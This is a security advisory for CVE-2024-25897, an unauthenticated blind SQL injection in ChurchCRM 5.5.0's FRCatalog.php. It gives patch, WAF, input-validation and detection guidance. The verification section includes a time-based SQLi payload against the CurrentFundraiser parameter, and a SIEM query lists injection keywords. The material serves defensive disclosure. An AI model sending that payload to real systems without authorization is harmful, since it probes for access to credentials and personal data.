CVE-2024-25897
📋 TL;DR
ChurchCRM 5.5.0 contains a blind SQL injection vulnerability in FRCatalog.php via the CurrentFundraiser GET parameter. Attackers can exploit this to extract database information or potentially execute arbitrary SQL commands. All ChurchCRM 5.5.0 installations with the fundraising module enabled are affected.
💻 Affected Systems
- ChurchCRM
📦 What is this software?
Churchcrm by Churchcrm
⚠️ Risk & Real-World Impact
Worst Case
Complete database compromise including sensitive user data, authentication credentials, financial records, and potential remote code execution through database functions.
Likely Case
Data exfiltration of sensitive information including user credentials, personal data, and financial records from the ChurchCRM database.
If Mitigated
Limited impact with proper input validation and WAF rules blocking SQL injection patterns.
🎯 Exploit Status
Time-based blind SQL injection requires no authentication and can be exploited with standard SQL injection tools like sqlmap.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.5.1 or later
Vendor Advisory: https://github.com/ChurchCRM/CRM/issues/6856
Restart Required: No
Instructions:
1. Backup your ChurchCRM installation and database. 2. Download the latest version from the official ChurchCRM repository. 3. Replace the vulnerable FRCatalog.php file with the patched version. 4. Verify the fix by testing the CurrentFundraiser parameter.
🔧 Temporary Workarounds
WAF Rule Implementation
allImplement web application firewall rules to block SQL injection patterns in GET parameters.
# Example ModSecurity rule: SecRule ARGS_GET:CurrentFundraiser "@detectSQLi" "id:1001,phase:2,deny,status:403"
Input Validation Filter
allAdd input validation to sanitize the CurrentFundraiser parameter before processing.
# PHP example: $currentFundraiser = filter_var($_GET['CurrentFundraiser'], FILTER_VALIDATE_INT); if($currentFundraiser === false) { die('Invalid parameter'); }
🧯 If You Can't Patch
- Disable or restrict access to the fundraising module if not required.
- Implement network segmentation to isolate the ChurchCRM server from sensitive systems.
🔍 How to Verify
Check if Vulnerable:
Test the CurrentFundraiser parameter with time-based SQL injection payloads like: /FRCatalog.php?CurrentFundraiser=1' AND SLEEP(5)--Check Version:
Check ChurchCRM version in admin panel or view source for version metadata.Verify Fix Applied:
Test the same payload after patching - should return immediately without delay.📡 Detection & Monitoring
Log Indicators:
- Unusual long response times for FRCatalog.php requests
- Repeated requests with SQL keywords in CurrentFundraiser parameter
- Error logs showing SQL syntax errors
Network Indicators:
- HTTP requests containing SQL injection patterns in GET parameters
- Unusual traffic patterns to FRCatalog.php endpoint
SIEM Query:
source="web_logs" AND uri_path="/FRCatalog.php" AND (query_string="*SLEEP*" OR query_string="*WAITFOR*" OR query_string="*BENCHMARK*")